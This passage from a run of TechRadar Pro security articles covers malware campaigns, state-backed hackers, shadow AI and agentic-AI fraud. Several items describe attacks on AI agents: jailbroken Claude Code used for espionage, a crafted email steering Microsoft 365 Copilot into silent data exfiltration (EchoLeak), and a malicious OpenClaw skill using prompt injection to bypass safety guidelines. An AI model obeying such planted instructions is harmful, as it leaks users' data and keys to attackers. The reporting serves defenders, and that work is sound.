Adversaries are using AI to sift through organizations' complex digital footprints, spotting tiny weaknesses or patterns that can be exploited, which lets them gain access to systems much faster than before.

On the defensive side, AI is already enriching analyst context. AI is being used to combine signals across domains, certificates, telemetry and intelligence sources to surface suspicious activity faster and with greater confidence.

However, clear governance is a must for the wider industry as AI investments only pay off if someone is clearly in charge of them. In practice, this looks like boards actually understanding AI’s trade-offs, having a defined risk appetite and clear cyber metrics that are tied directly to up-time, reputation and regulatory risk rather than just a dashboard of automated alerts.

Third, the cyber-hygiene basics that AI will amplify need to be fixed and maintained. The Iran crisis has exposed how much damage can be done by exploiting long-standing weaknesses like unpatched remote access, flat networks and factory-set passwords on critical control equipment that were never changed.

With more than half the CIOs seeing software supply-chain security and third-party distribution as high risk, 70% of them are investing in enhanced controls there. Enhanced controls in this context mean tightened due-diligence on vendors and M&A targets.

They also mean demanding transparency into code provenance and build-pipelines, in addition to using AI-assisted monitoring to spot anomalies in partner behavior before an incident cascades into an organization's environment.

Finally, if a nation-scale disruption is to be expected (as it should be), it should be rehearsed for. Iran’s near-total connectivity blackout, combined with attacks on critical infrastructure communications, demonstrates the failure of “business-as-usual” assumptions. CIOs are increasingly planning to work with incident-response specialists and threat intelligence providers.

However, many still lack mature, tested continuity plans that assume prolonged outages, disinformation and simultaneous incidents across multiple suppliers. In an AI-driven crisis, businesses that have practiced decision-making under pressure, with partial data and automated attacks, will fare better than those still relying on a static playbook.

Final thoughts

Most organizations around the globe are watching the events in Iran unfold, with defenses designed for a slower, less sophisticated cyber security posture. CIOs and IT leaders are learning in real time that when an attack occurs, there will not be a safe, quiet moment to prepare for it.

If adversaries are using AI to move faster, hide better and hit harder, businesses need to be equipped with governed AI capabilities, hardened basics and rehearsed crisis plans of their own.

Anything less falls equivalent to hoping that the tactics being perfected over an active war-zone will never be turned on your own business, which is simply not a strategy.

We've ranked the best patch management software.

This article was produced as part of TechRadar Pro Perspectives, our channel to feature the best and brightest minds in the technology industry today.

The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/pro/perspectives-how-to-submit

• A fake photo tool ranked high in search results tricks users into running malware via ClickFix tactics
• Victims first get infected with CastleLoader, which then deploys NetSupport RAT and a custom CastleStealer
• The campaign highlights how SEO poisoning and social engineering can turn simple tasks into credential theft and remote compromise

A website promising to remove backgrounds from selfie photos is actually just dropping infostealing malware on people’s computers, security researchers are saying.

Cybersecurity experts at Huntress outlined how they discovered a website which, through SEO poisoning, managed to work its way to the top of search engine results pages. Therefore, when people search for background removal tools, there is a good chance they’ll land on this particular, malicious site.

When they upload their photos to this service, it doesn’t really get processed. Nothing gets uploaded or shared in any way. However, the site then requests the user to “verify they’re human” by opening up the Windows Run program and pasting a command that was copied onto their clipboard.

CastleLoader, CastleStealer, and NetSupport RAT

In typical ClickFix fashion, the attackers actually demand the victims to run malware themselves, first infecting their devices with CastleLoader. This is the main loader that is used to deliver additional payloads.

Through CastleLoader, the miscreants can then deploy stage-two malware, including NetSupport RAT, and CastleStealer.

The former is a remote access trojan (RAT) which grants the attackers remote access to infected systems, while the latter is a custom .NET stealer that targets browser credentials, crypto wallet data, Discord tokens, and Telegram session files.

“What started as someone potentially trying to remove the background from a selfie ended with a custom .NET stealer rifling through their browser passwords, crypto wallet vaults, and Telegram session, plus a NetSupport RAT dropped on disk for follow-up access,” Huntress explained.

ClickFix attacks can be mitigated through education - users should know that no legitimate service will ask users to verify they’re not a bot with on-device activity (such as, running a program locally). Alternatively, admins can disable the Win + R shortcut for Run, making it less likely for the victims to actually run the malicious code.

• North Korean APT37 (ScarCruft) gang compromised a Yanbian gaming platform to deliver the BirdCall backdoor
• On Windows, it enabled data theft and command execution; on Android, it exfiltrated contacts, messages, media, and ambient audio
• The malware is actively maintained, with Android versions still hosted, targeting ethnic Koreans and defectors in China

North Korean state-sponsored threat actors are apparently targeting their compatriots living in (or moving through) China with advanced Android backdoors across gaming platforms.

A report from security researchers ESET claims to have seen an advanced supply-chain attack that probably began in late 2024. The threat actors, most likely ScarCruft (also known as APT37, or Reaper), managed to compromise SQgame, a multi-platform gaming service built specifically for the people of Yanbian.

The Yanbian Korean Autonomous Prefecture is an autonomous prefecture in China’s Jilin Province. It is located near the border with North Korea and Russia, and was established to give administrative autonomy to the large population of ethnic Koreans living there. According to ESET, Yanbian is also a key crossing point for North Korean refugees and defectors, which could be one of the reasons why it’s being targeted.

BirdCall malware

"In the attack, probably ongoing since late 2024, ScarCruft compromised Windows and Android components of a video game platform dedicated to Yanbian-themed games, trojanizing them with a backdoor," ESET said.

The backdoor is called BirdCall and, depending on the platform it is installed on, can do different things. On Windows, it can grab screenshots, log keystrokes, steal the contents of the clipboard, execute shell commands, and exfiltrate data. All of the stolen info is then uploaded to legitimate cloud services such as Dropbox or pCloud.

On Android, things are a bit different, allowing ScarCruft to also exfiltrate contact lists, SMS messages, call logs, media files, documents, screenshots, and even ambient audio. So far, the malware was updated seven times, leading researchers to believe it is being actively maintained.

ESET says that the platform is still hosting malicious games. However, these seem to be limited to the Android platform.

For several years now, AI has been showing up in fraud as an accelerant. It drafted phishing emails, polished social engineering scripts, helped attackers move faster. The human operator still sat close to every meaningful step.

But that distance is shrinking really fast. In September 2025, Anthropic’s Claude Code was used in a cyber-espionage campaign when AI handled 80 to 90% of tactical operations across roughly 30 targets.

A few months later, reporting on the Mexican government breach described a jailbroken Claude Code setup that Gambit Security said stole more than 150GB of data and exposed roughly 195 million identities.

That’s the real break with the past. Now we are not looking at AI as a helper inside a criminal workflow, but as confronting systems that can carry out large parts of the workflow by themselves.

Cybercrime has changed its shape

Once an agent has tools, context, and permission, cybercrime seems to look like an always-on operation. It can recon targets, write exploits, harvest credentials, move laterally, and package stolen data at machine speed.

It matters because those capabilities are now part of the real threat environment. Attacks by AI-enabled adversaries rose 89% year over year, and autonomous AI adoption is climbing despite security concerns.

We’re witnessing a setting for the next fraud wave: agents enter mainstream systems at the same moment attackers learn how to weaponize them.

Fraud loves scale, repetition, and weak supervision. Agentic systems bring all three. They do not get tired and do not forget the playbook. They can be pointed at thousands of tiny decisions that add up to huge losses.

Attribution is starting to fail

Traditional attribution leans on familiar clues. Investigators compare IP paths, malware families, domains, infrastructure, and other indicators of compromise — even though the field has long known that proxies, false flags, and shared tooling can blur that picture.

Agentic AI makes the problem worse because the operational exhaust isn’t tied neatly to a single human hand anymore. The model can generate fresh code, adapt the sequence of actions, or distribute work across tools and sessions. In the Mexico case spotlight, there was an unidentified attacker who was aided by AI tools, and this kind of ambiguity should worry every defender.

So, the point is not that humans disappear, but responsibility gets smeared across prompts, models, tools, delegated permissions, and machine-generated actions. And that weakens the old comfort that attribution will eventually catch up. The forensic trail now contains a non-human operator making consequential moves inside the attack chain.

Identity has to travel with the agent

Every meaningful AI action should carry a verifiable cryptographic identity. Once an AI agent is able to act inside a system, those actions should not be anonymous. Each one should be signed, linked to a verifiable identity, and captured in a trustworthy audit trail. Without that, we are asking security teams to govern autonomous behavior that leaves no reliable proof of authorship.

The idea isn't fringe, and it's here. NIST launched an AI Agent Standards Initiative in February. Its concept paper explicitly calls for identifying agents, linking user identities to delegated actions, logging agent activity, and tracking the provenance of prompts and data inputs.

Now, this is the market already telling us why this matters – 68% of organizations cannot clearly distinguish AI agent activity from human activity, even as 73% expect agents to become vital within a year. And it’s not a minor governance gap, it’s a direct liability in any environment where fraud, abuse, or data theft can be carried out through an agent.

The hard part is not cryptography, but governance

We already know how to sign and verify digital artifacts. Provenance, integrity, and identity-bound signatures can be made usable at scale. The missing move is extending that discipline from models and software artifacts to the actions agents take after deployment.

That won’t be simple. Standards have to work across model labs, enterprise stacks, open-source tooling, API gateways, agent protocols. Privacy questions are real, too, because auditability cannot become a back door for blanket surveillance.

Still, those are design problems, and not excuses for anonymity. I believe what’s missing is an identity verification layer that lets people, institutions, and eventually AI agents prove who they are, what they’re allowed to do, and which credentials can be trusted, without exposing the raw data underneath. Built well, that kind of system gives trust a cryptographic form. It can move across platforms, survive handoffs between systems, and hold up under scrutiny.

Fraud spreads wherever identity management is flimsy, and provenance breaks down. If access, eligibility, and high-risk actions are tied to verifiable credentials, it becomes much harder for a bot, a synthetic identity, or an autonomous agent to pass through systems on empty claims. The action carries history with it. The trust signal does too.

AI fraud has crossed a threshold. When an agent can scout, decide, execute, and document the operation, anonymity becomes a structural weakness instead of convenience.

We need a security model that does more than log what happened after the fact. We need one that can prove who stood behind an action, who delegated it, and whether that identity can be trusted in the first place. In a world of autonomous agents, that is not a nice safeguard now, but the baseline for keeping fraud governable.

We've ranked the best Identity Theft Protection.

This article was produced as part of TechRadar Pro Perspectives, our channel to feature the best and brightest minds in the technology industry today.

The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/pro/perspectives-how-to-submit

AI tools have long been a double-edged sword, used by attackers and defenders alike.

However, it has recently shown its third edge; as it becomes increasingly embedded within organizations as a tool, it is now also an attack surface which cybercriminals will look to exploit, and which organizations must strive to protect.

At first glance, it may appear that this has tipped the AI scales in favor of attackers. AI has industrialized the cybercrime landscape, boosting the efficiency of attacks, as well as enabling them to be scaled up.

And now, it is no longer just a weapon but a new attack vector. However, this same efficiency can be used to help power defenses against cyberattacks, helping to protect organizations.

A new frontier of AI-enhanced attacks

While AI offers immense potential for innovation, it has also been adopted as a powerful tool by cybercriminals to execute more sophisticated attacks. Threat actors like Storm-0817, for instance, actively use AI to assist in malware development and social media scraping.

Groups like the Black Basta collective have also used AI to craft emails in multiple languages, thereby expanding their global reach. OpenAI recently disrupted dozens of malicious operations that were misusing its models for malware creation, phishing, and disinformation.

While most cybercriminal groups still seem to be using AI as more of an assistive tool at this stage, a future of fully automated cyber attacks is growing increasingly possible.

In November of last year, Anthropic disrupted the first reported AI-orchestrated cyber espionage campaign, during which its agentic AI tool Claude Code was manipulated to conduct automated reconnaissance and intrusion attempts against global targets.

It is highly likely that we will see more attacks like this in the coming months, as attackers gain skill and confidence in using AI.

Two edges becomes three

The third edge represents a shift in AI, away from being just a weapon or a shield and instead becoming a handle which attackers can use to steer an organization's own IT infrastructure against itself, whether through attackers exploiting plugins used to connect AI tools to enterprise data, or via ‘hijacking’ an AI assistant. As agentic AI becomes increasingly the norm, we will see this more and more.

This can be seen in the 2025 compromise of the “Drift” AI module linked to Salesloft, which resulted in the theft of Salesforce data from several hundred organizations, including multiple security vendors.

Another example is the recent “EchoLeak” campaign against Microsoft 365 Copilot, which revealed how a carefully crafted email could deliver malicious instructions to an embedded AI assistant, leading to silent data exfiltration.

Finally, this third edge to AI has also been sharpened by the growing problem of Shadow AI, where employees use unauthorized AI tools, creating a ‘leaky bucket’ where sensitive corporate information is sometimes fed into public models.

AI’s neutrality: defense vs offense

Crucially, organizations must not shy away from AI simply because it is an attack vector. AI as a technology offers significant efficiency benefits to organizations across sectors, and so the answer isn’t to avoid it but to protect AI tools and systems properly.

The best way to balance AI risk with optimized business potential is to take a security-first and human-centric approach. That means putting people in control while using AI to support decision-making. This ‘Secure AI’ approach encompasses a system that is transparent, explainable, and aligned with regulations to meet unique needs and IT company ambitions.

The silver lining is AI’s own neutrality; the very same algorithms that power sophisticated cyber attacks can also be used to support modern defense systems. For instance, AI can streamline threat detection, incident response, and risk management.

Where traditional detection methods fall short in cybersecurity, defensive AI can assist in identifying ‘beaconing’ behavior through pattern recognition. Anomalies are raised to security teams through real-time notifications, enabling prompt investigation alongside required action.

Overall, this supports teams with more routine elements of system security, including the documentation of security intelligence, event information, and analysing potentially harmful emails alongside malicious files.

Machine learning can also be used in autonomous threat detection and response programs.

The myth of the golden ticket

The intention of the user largely dictates the risk-reward ratio. AI, like any tool, is prone to misuse and can be poisoned or hijacked, which means it isn’t a ‘golden ticket’ in cybersecurity.

Defenders who protect systems must not only understand and be trained on the testing of AI systems and their security, but also be in decision-making positions to execute what AI cannot adequately do.

In an era of industrialized cybercrime, success won’t be found in the AI buzz but in how well we blunt the third edge before it is turned against us.

We've reviewed the best Antivirus Software.

This article was produced as part of TechRadar Pro Perspectives, our channel to feature the best and brightest minds in the technology industry today.

The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/pro/perspectives-how-to-submit

• Cisco Talos warns of Firestarter, a new malware targeting unpatched Firepower and Secure Firewall device
• UAT‑4356 group exploited flaws CVE‑2025‑20333 and CVE‑2025‑20362 to deploy Line Viper before dropping Firestarter
• CISA confirmed exploitation against at least one federal agency

Security researchers have warned of Firestarter, a brand new custom-built malware which targets unpatched Cisco Firepower and Secure Firewall devices, persisting over reboots, security patches, and even firmware updates.

Experts from Cisco Talos flagged Firestarter only works on devices running Adaptive Security Appliance (ASA), or Firepower Threat Defense (FTD) software. It was built by a threat actor tracked as UAT-4356, a group Cisco has been warning about for at least two years now.

In mid-2024, Cisco said that sophisticated threat actors with possible ties to eastern nation-states were abusing two flaws in Cisco VPNs and firewalls to drop malware. The same group, which is also being tracked as STORM-1849, abused two flaws at the time: CVE-2024-20353 and CVE-2024-20359.

Confirming the breach

This time around, they are abusing a missing authorization issue tracked as CVE-2025-20333, and a buffer overflow bug tracked as CVE-2025-20362, to first deploy Line Viper (a user-mode shellcode loader), before dropping Firestarter.

Line Viber was said to be able to run CLI commands, capture packets, bypass VPN Authentication, Authorization, and Accounting (AAA) for actor devices, suppress syslog messages, steal user CLI commands, and force a delayed device restart.

For at least one Federal Civilian Executive Branch (FCEB) agency, the devices were compromised in the window of time between the patch being released, and being deployed on the devices:

“CISA has not confirmed the exact date of initial exploitation but assesses the compromise occurred in early September 2025, and before the agency implemented patches in accordance with ED 25-03,” CISA said in its security advisory.

By tweaking the startup mount list, the malware makes sure it persists even after reboots.

Those running Firepower and Secure Firewall, and looking for mitigations and workarounds, should read Cisco’s security advisory here. The company said it “strongly recommends” reimaging and upgrading the device using the fixed releases.

Via The Hacker News

• Google identifies new threat group, UNC6692, using spam floods and fake IT support messages via Microsoft Teams to trick victims
• Targets were lured to a landing page that harvested credentials and deployed a three‑part malware framework themed around snow
• The toolkit includes a persistence‑focused browser extension, a tunneling tool for data exfiltration, and a backdoor enabling full endpoint takeover

Google has sounded the alarm on a previously undocumented threat actor group that uses cheeky social engineering tactics to deploy a trilogy of malware.

In an in-depth report Google said it saw UNC6692 - seemingly a new collective - bombard target email inboxes with countless spam messages in a short timeframe.

Soon after, they would reach out to the owner of that inbox via Microsoft Teams, through the cross-tenant feature, and introduce themselves as IT/helpdesk officials. They would say they were tasked with fixing the spam issue and would share a link to a landing page where the alleged fix can be found.

The 'snow' framework

Victims who follow the link are first asked to do a “health check” by clicking a button on the page which prompts the user to authenticate using their email and password which are then siphoned to the attackers’ servers.

Google also noticed the login attempt never works on the first try - which is a deliberate attempt to increase perceived legitimacy and make sure victims don’t share a fake or typo’d password.

After “logging in”, the page then performs an “email integrity check”, which is just a cover for what goes on in the background - the deployment of a malware framework consisting of three elements.

"By the time the user receives a 'Configuration completed successfully' message, the attacker has secured the credentials and potentially established a persistent foothold on the endpoint using these staged files," Google said in the report.

The framework is themed around snow, and contains three tools: SnowBelt, SnowGlaze, and SnowBasin.

The first is a Chromium-based extension that establishes persistence via the browser’s extension registration system. The extensions are often named “MS Heartbeat” or “System Heatbeat”.

The second is a tunneler that creates an authenticated WebSocket tunnel, enabling easy communication and possible data extraction. The third one is a backdoor that allows full endpoint takeover.

According to UpGuard’s late-2025 report, nearly 90 percent of security professionals use unapproved AI tools at work. The people responsible for enforcing security policy are, by their own admission, ignoring it. More than 80 percent of workers across all roles use unsanctioned AI, and executives are the most prolific offenders.

We’ve been here before. A decade ago, the fight was over shadow IT — personal Dropbox accounts, unapproved SaaS apps, data flowing through tools that never passed a security review. Most organizations eventually got that under control with CASBs, discovery tooling, and better-sanctioned alternatives.

But those playbooks assumed the tools were dumb pipes: they moved and stored data, and the fix was visibility into where it went. Shadow AI doesn’t work that way, because AI tools don’t just store your data — they process it, and in some cases retain it.

When someone pastes a customer list into a free-tier chatbot or feeds proprietary code into an LLM to debug it faster, that data enters a system the organization has no control over. There’s no audit trail, and often nobody knows it happened.

On the compliance side, that creates exposure that compounds the longer it goes unaddressed: no data processing agreement, no documented retention policy, and no ability to respond to a GDPR subject access request or demonstrate to auditors that sensitive data stayed within regulatory boundaries.

The costs of Shadow AI are measurable. Recent Netwrix research indicates that organizations with high levels of unsanctioned AI usage experience data breach costs that are, on average, $670,000 higher than those with lower usage.

And banning AI doesn’t fix it — Software AG found that 46 percent of employees would keep using unapproved tools even after an explicit ban. Prohibition just pushes the behavior underground.

There’s another cost that doesn’t show up in breach reports. When employees rely on unapproved models for analysis, drafting, or code generation, nobody is validating what comes back. Hallucinated data points end up in executive briefings.

Flawed code ships to production because the model that wrote it was never vetted against the organization's standards. Legal teams draft language using tools that nobody in compliance has reviewed.

The accuracy of the organization's own outputs erodes over time — and because the tools are unapproved, the teams using them have built workflows the business can’t see, can’t audit, and can’t replace if the tool changes its terms or gets cut off tomorrow.

From chatbots to autonomous agents

Everything above describes employees using AI as a tool — typing a prompt, getting a response, pasting it somewhere. The next wave is different. Agentic AI systems don’t wait for prompts. They take actions: reading email, executing code, accessing files, chaining tasks together, all running with the user’s own permissions.

OpenClaw, the open-source AI agent that racked up 145,000 GitHub stars in weeks, shows where this is heading. As a productivity tool, it’s impressive. As an attack surface, it’s what Cisco called a security nightmare.

When Cisco’s AI security research team tested the top-ranked community extension on OpenClaw’s skill repository, they found it was functionally malware: it silently sent data to an attacker-controlled server via embedded shell commands while using prompt injection to bypass the agent’s safety guidelines.

That skill had been downloaded thousands of times. It was one of at least 230 malicious extensions uploaded to the repository within weeks of OpenClaw going viral. Kaspersky found 512 vulnerabilities in a single audit, eight of them critical. China banned it from government systems.

OpenClaw is one platform, but the pattern — broad system access, community-sourced plugins, weak default security — is the direction the whole category is moving. Gartner predicts 40 percent of enterprise applications will feature task-specific AI agents by the end of this year, up from under five percent in 2025.

These agents break the assumptions most security tooling is built on. An agent sending an email looks identical to the legitimate user. EDR sees normal traffic.

There’s no malicious binary to flag. And because agents process external content — emails, web pages, documents, images — adversaries can embed instructions in that content and hijack the agent’s behavior without any human clicking anything.

Researchers have already demonstrated a single poisoned email causing an agent to hand over private keys from the host machine.

What actually works

Blanket bans fail. That much is obvious from the data. What works is giving people something better to use. One healthcare system that replaced its AI ban with approved tools saw unauthorized use fall 89 percent.

People reach for shadow AI because it solves real problems faster than whatever IT has sanctioned. Close that gap and most of the risky behavior goes away on its own.

Beyond that, treat AI interactions like data transfers. Apply DLP policies to prompts. Classify what should never enter an external model.

Build visibility into what tools employees are actually using — BlackFog’s research suggests 99 percent of organizations currently have no way of measuring shadow AI activity in their environments.

For agentic AI, the bar has to be higher. Autonomous tools need sandboxing, least-privilege access, and proper vetting of every extension before deployment.

Security teams need monitoring built for AI-native threats — prompt injection, supply chain compromise through malicious skills, credential leakage through agent memory — because legacy endpoint tools weren’t built to catch any of this.

None of this works as a policing exercise, though. Governance has to feel like a service to employees, not a constraint imposed on them. The organizations that figure this out will be in a strong position. The ones still pretending it’s not their problem are already behind — their data has been leaving the building, one prompt at a time, for months.

We've featured the best online cybersecurity course.

This article was produced as part of TechRadar Pro Perspectives, our channel to feature the best and brightest minds in the technology industry today.

The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/pro/perspectives-how-to-submit

• Huntress sinkholes adware signed by Dragon Boss Solutions LLC
• Malware disabled antivirus, left open update domains exploitable for $10
• Tens of thousands of endpoints compromised, including universities, OT networks, governments, and Fortune 500 firms

Security researchers Huntress recently stumbled upon a piece of adware that, by all accounts, should have been a boring, run-of-the-mill ad-displaying nuisance. However, what they found under the surface raised a few eyebrows and warranted deeper investigation.

In late March 2026, Huntress was alerted to a piece of software signed by a company called Dragon Boss Solutions LLC. This company, allegedly working on “search monetization research” (but instead just displaying unwanted ads and redirects to people) came with an advanced update mechanism that disabled antivirus programs and prevented them from being started again.

While analyzing how the malware worked, the researchers discovered that the threat actors did not register the main update domain, or the fallback one which, at the same time, presented a major risk and a huge opportunity to do good.

Severing the ties

“More concerning is it turned out to have an open door baked right into its update configuration, one which anyone with $10 could have walked straight through,” Huntress said. In other words, someone could have registered these domains and thus taken control over a vast network of infected computers.

Instead, it was Huntress who bought the domains, effectively sinkholing the connection from all infected hosts.

“Within hours” they saw “tens of thousands of compromised endpoints reach out looking for instructions that, in the wrong hands, could have been anything.”

Analyzing incoming IP addresses, Huntress researchers found 324 infected devices in high-value places, including 221 academic institutions, 41 Operational Technology networks in the energy and transport sectors, 35 municipal governments, state agencies, and public utilities, 24 primary and secondary educational institutions, and 3 healthcare organizations. Furthermore, networks of multiple Fortune 500 companies were compromised, as well.

To stay safe, the researchers recommend system admins look for WMI event subscriptions containing “MbRemoval” or “MbSetup,” scheduled tasks referencing “WMILoad” or “ClockRemoval,” and processes signed by Dragon Boss Solutions LLC.

• Malicious actor bought 31 WordPress plugins from Essential Plugin
• Updates injected backdoors, granting full site access
• Spam campaigns hidden from owners, C2 resolved via Ethereum smart contract

A hacker bought more than 30 legitimate WordPress plugins and abused their good standing to infect tens of thousands of websites with backdoors.

Austin Ginder, founder of Anchor Hosting, reported how a client recently alerted him of a known plugin suddenly allowing unauthorized third-party access. The investigation led him to a somewhat troubling discovery: a company that developed 31 WordPress plugins, both free and premium versions, was sold in early 2025, to a person calling themselves “Kris”.

That person then added malicious code to all plugins and pushed the update to the WordPress websites actively using them.

Injecting sophisticated code

The malicious company is called Essential Plugin, and claims its products have been installed more than 400,000 times and were being actively used by more than 15,000 customers. The official WordPress repository shows more than 20,000 active WordPress installations.

The malware was essentially a backdoor that granted the attacker full access to the websites. The goal seems to have been to propagate existing spam campaigns:

“The injected code was sophisticated,” Ginder explained. “It fetched spam links, redirects, and fake pages from a command-and-control server. It only showed the spam to Googlebot, making it invisible to site owners. And here is the wildest part. It resolved its C2 domain through an Ethereum smart contract, querying public blockchain RPC endpoints. Traditional domain takedowns would not work because the attacker could update the smart contract to point to a new domain at any time.”

The full list of compromised plugins can be found on this link. If you are using any of these, it would be wise to replace them with a safer alternative. Ginder also shared a patching method on his blog.

In the meantime, WordPress removed all of the malicious plugins from the repository.

Via TechCrunch

• Socket finds 108 malicious Chrome extensions stealing tokens and data
• Extensions harvest Google account info, hijack Telegram sessions, and open backdoors
• Likely Russian MaaS operation; 20,000+ installs, still live in Web Store

A single threat actor has apparently smuggled more than 100 malicious browser extensions into the official Google Chrome Web Store, looking to steal authentication tokens, and establish backdoors to people’s devices.

Analyzing Google’s browser repository, security researchers Socket found 108 extensions split into five distinct categories: Telegram sidebar clients, slot machines and Keno games, YouTube and TikTok enhancers, text translation tools, and browser utilities.

While on the surface, all of those worked as intended, in the background they were doing all sorts of malicious things.

TIered system and new announcements

For example, a cluster of 78 extensions was seen injecting attacker-controlled HTML into the user interface, while 54 extensions were harvesting emails, names, profile pictures, and Google account IDs.

They also stole Google OAuth2 Bearer tokens. A third group of 45 extensions works as a backdoor, fetching commands from the C2 infrastructure and opening arbitrary URLs. A few extensions stripped security headers and injected ads into YouTube and TikTok.

However, the most dangerous extension was seen stealing Telegram Web sessions every 15 seconds, extracting data from local storage and the session token for Telegram Web.

While the extensions were published from five separate profiles, they all connected back to the same command-and-control infrastructure, which suggests that this is all the work of a single threat actor. Judging by the comments in the code for authentication and session theft, Socket concluded that this was most likely a Russian malware-as-a-service (MaaS) operation. However, it was not able to attribute the campaign to a specific actor, or cluster.

Some sources said the extensions were installed at least 20,000 times by now and that despite Socket’s takedown requests, Google has not yet removed the extensions from the repository - so if you are using any of these, it would be best to uninstall them immediately.

• Infoblox & Chong Lua Dao uncover global MaaS platform
• Spoofed domains harvest KYC data, intercept SMS, drain bank accounts
• Captive workers trafficked into Cambodian scam compound tied to elites

Malware operators - people sending phishing emails and guiding people through the infection chain - don’t always do it on their own free will - sometimes they are trafficked into scam centers and forced to work there.

One such global criminal organization was uncovered by security researchers Infoblox Threat Intel, and Vietnamese non-profit Chong Lua Dao, who recently observed a spike in anomalous DNS traffic across Infoblox customer networks, which led them to a previously undocumented malware-as-a-service (MaaS) Platform.

Further investigation uncovered that the platform registers roughly 35 new domains each month, and is active in at least 21 countries including Indonesia, Thailand, Spain, and Turkey.

Political and military ties

The domains spoof legitimate government and banking websites. Victims that download the fake software are required to go through the Know Your Customer (KYC) process, during which the attackers harvest personal data, biometrics, and more.

Once installed, the malware grants the attackers control over the device, including intercepting SMS messages for one-time passcodes, and using actual banking apps to wire money out.

At the same time, several captive workers contacted Chong Lua Dao, requesting rescue from K99 Triumph City - a compound in Sihanoukville, Cambodia that was previously flagged by the UN for large-scale fraud and forced labor.

After being rescued, they shared closed-group chat logs, screenshots, and other data that confirmed a service-based malware distribution and scam operation was running on associated infrastructure, and that several tracked domains were being used in the scam.

The research also uncovered that there is a small, tight-knit group of politically connected individuals that control who gets access to the K99 compound. This centralized organization has people at the top with political cover and the most significant name that surfaced is Senator Kok An.

Apparently, he's a well-known figure in Sihanoukville's casino and real estate world, and his name has appeared in multiple reports connecting the city's gambling and organized crime infrastructure to political power.

• CPUID.com briefly compromised to serve malware
• Tainted downloads used DLL sideloading with CRYPTBASE.dll
• Sophisticated Trojan deployed, flagged by 20 AV engines

CPUID.com, a popular website for PC diagnostics tools has confirmed it was compromised and used to serve malware.

"Investigations are still ongoing, but it appears that a secondary feature (basically a side API) was compromised for approximately six hours between April 9 and April 10, causing the main website to randomly display malicious links (our signed original files were not compromised),” the project’s maintainers told BleepingComputer. The breach was found and has since been fixed."

In other words, the software hosted on CPUID was not poisoned - it was merely serving different download links. Still, victims might think they’re downloading legitimate software.

Not your typical malware

Researchers from Kaspersky found that the download links for this software was tainted:

CPU-Z (version 2.19)
HWMonitor Pro (version 1.57)
HWMonitor (version 1.63)
PerfMonitor (version 2.04)

The modified variants included a legitimate, signed executable and a malicious DLL named 'CRYPTBASE.dll', used for DLL sideloading.

"The malicious DLL is responsible for C2 [command and control] connection and further payload execution. Prior to this, it also performs a set of anti-sandbox checks and, if all the checks have passed, it connects to the C2 server," Kaspersky said.

At the same time, researchers from Igor’s Labs and vxunderground said the malware was rather sophisticated.

“As I began poking this with a stick, I discovered this is not your typical run-of-the-mill malware,” stated vxunderground.

“This malware is deeply trojanized, distributes from a compromised domain (cpuid-dot-com), performs file masquerading, is multi-staged, operates (almost) entirely in-memory, and uses some interesting methods to evade EDRs and/or AVs such as proxying NTDLL functionality from a .NET assembly.”

The website has since been cleaned up. VirusTotal shows that currently 20 antivirus engines are flagging the malware - some call it “Tedy Trojan”, others “Artemis Trojan”. It seems to be an infostealer.

North Korea runs one of the world’s most aggressive cyber operations. From billion-dollar cryptocurrency theft to high-profile supply chain compromises, its state-backed operators hammer security teams with a potent blend of espionage, financial crime and destructive campaigns.

The likes of Lazarus and Kimsuky sit at the center of the DPRK ecosystem. And they show no mercy — targeting anyone from startups to government organizations and critical IT infrastructure — in pursuit of revenue, intelligence, and strategic leverage.

The constant pressure these groups apply has shaped how organizations defend themselves. To date, the playbook has been largely reactive and malware-centric.

Blue teams focus efforts on dissecting payloads, reverse engineering samples and racing to detect the next variant. But new research into DPRK activity suggests defenders may be tracking the wrong signal.

In fact, one of the most reliable ways to track these actors is through the infrastructure they leave behind.

The blind spot in modern defense

Many organizations are investing heavily in endpoint protection and malware detection, which is essential for fending off imminent threats. However, far less attention is paid to infrastructure level telemetry.

It’s this deep analysis, which can highlight consistent operational behaviours, that many security teams are missing out on.

A joint investigation by the Acronis Threat Research Unit and Hunt.io set out to map ongoing DPRK infrastructure. It uncovered persistent infrastructure reuse linking campaigns over time: shared certificates spanning twelve IP addresses, identical Fast Reverse Proxy (FRP) tunnelling nodes deployed across multiple hosts, and exposed staging servers hosting gigabytes of operational tooling.

Why does this matter?

Payloads are engineered to mutate and evade signature-based detection. Infrastructure, by contrast, reflects habits — repeatable configurations, templated deployments and reused communication channels that persist across campaigns.

Even mature internet security programs often center response strategies around payload analysis and alert triage, which can leave preparation activity invisible until an intrusion is underway. This may explain why DPRK operators continue to reuse infrastructure for years, even after major supply chain incidents.

Open directories expose operational staging

Take exposed HTTP directories, for example. While investigating, researchers repeatedly found servers hosting structured toolkits that included credential harvesting utilities, remote access tools, exfiltration binaries and tunnelling components.

In one case, the exposed environment contained thousands of files and nearly two gigabytes of operational tooling. It resembled a live operator workspace rather than a simple malware drop location. In practical terms, it felt less like discovering a single malicious file and more like stumbling into an active DPRK toolkit mid operation.

This discovery shows how DPRK operators optimize for speed. Open directories reduce friction and allow attackers to retrieve tools quickly during an intrusion without maintaining complex delivery infrastructure.

It also shows operational maturity. If attackers are comfortable staging tooling at this scale, it points to a focus on efficiency and repeatability — and that they do not expect defenders to be monitoring these environments consistently.

Tunnelling infrastructure shows how campaigns scale

Tunnelling infrastructure provides one of the clearest examples of infrastructure reuse in practice.

In the joint investigation, researchers identified eight identical Fast Reverse Proxy (FRP) nodes running on the same port across different hosts. FRP is commonly used to create reverse tunnels that allow operators to maintain access to compromised systems, even when inbound connections are restricted. Finding the same configuration replicated across multiple servers points to templated deployment rather than ad-hoc setup.

The good news is that when tunnelling nodes are provisioned in the same way across campaigns, they create predictable artefacts that defenders can track. Even if domains rotate and malware families evolve, the underlying access layer may remain consistent.

In the case of DPRK infrastructure, repeatability points to operational efficiency — but it also offers defenders a more durable hunting signal than any single malicious binary.

Infrastructure is the connective tissue

Across four separate hunts, the same patterns kept resurfacing. Exposed staging directories packed with credential theft tooling. Fast Reverse Proxy tunnels configured identically across different VPS hosts. Reused certificates linking twelve IP addresses back to the same operational clusters.

These were not isolated discoveries. They were recurring elements of a structured ecosystem.

